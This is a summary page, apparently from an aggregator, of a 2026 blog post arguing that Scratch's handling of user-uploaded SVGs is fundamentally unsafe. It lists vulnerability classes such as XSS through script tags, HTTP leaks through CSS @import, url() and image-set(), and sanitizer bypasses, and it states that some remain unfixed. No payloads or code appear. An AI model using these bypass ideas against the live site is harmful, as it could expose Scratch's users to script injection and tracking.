The Woes of Sanitizing SVGs
Scratch has faced recurring security issues due to its handling of user-generated SVGs, repeatedly patching vulnerabilities such as XSS and HTTP leaks only to encounter new ones stemming from the inherent risks of parsing untrusted SVG content. Despite layers of sanitization using tools like DOMPurify and custom CSS parsers, attackers have consistently found bypasses through SVG features like script tags, CSS imports, url() functions, and newer CSS capabilities. The article argues that Scratch's approach to SVG sanitization is fundamentally flawed and unsustainable due to the complexity and evolving nature of web standards. Multiple vulnerabilities remain unfixed or only partially mitigated as of 2026.
- ▪Scratch uses user-generated SVGs for functionality like bounding box measurement, requiring them to be temporarily injected into the DOM, which creates security risks.
- ▪XSS and HTTP leak vulnerabilities have been discovered repeatedly since 2019, including through script tags, CSS @import, url(), image-set(), and long CSS transitions.
- ▪Sanitization methods such as regex filtering and DOMPurify have proven insufficient due to bypasses like case variation, escape sequences, and unanticipated SVG/CSS features.
- ▪As of 2026, vulnerabilities allowing full page restyling and HTTP leaks via image-set() remain unfixed despite being reported.
- ▪The author contends that Scratch's incremental sanitization approach is doomed because it cannot keep pace with the complexity and evolution of SVG and CSS specifications.
Opening excerpt (first ~120 words) tap to expand
The woes of sanitizing SVGs 2026-04-11 on muffin.ink Scratch has a long history of SVG-related vulnerabilities. The source of these is that Scratch parses user-generated (ie. attacker-controlled) content into an <svg> element and appends it into the main document for various operations (eg. measuring SVG bounding box in a more reliable way than viewbox or width/height). No matter how briefly the SVG remains in the main document, this is an inherently unsafe operation. Scratch's approach to making this safe has been to build increasingly complex infrastructure around parsing the SVG and the markup within to remove dangerous parts. I think Scratch's approach to SVG sanitization is doomed.
…
Excerpt limited to ~120 words for fair-use compliance. The full article is at muffin.ink.
Discussion
0 commentsMore from muffin.ink
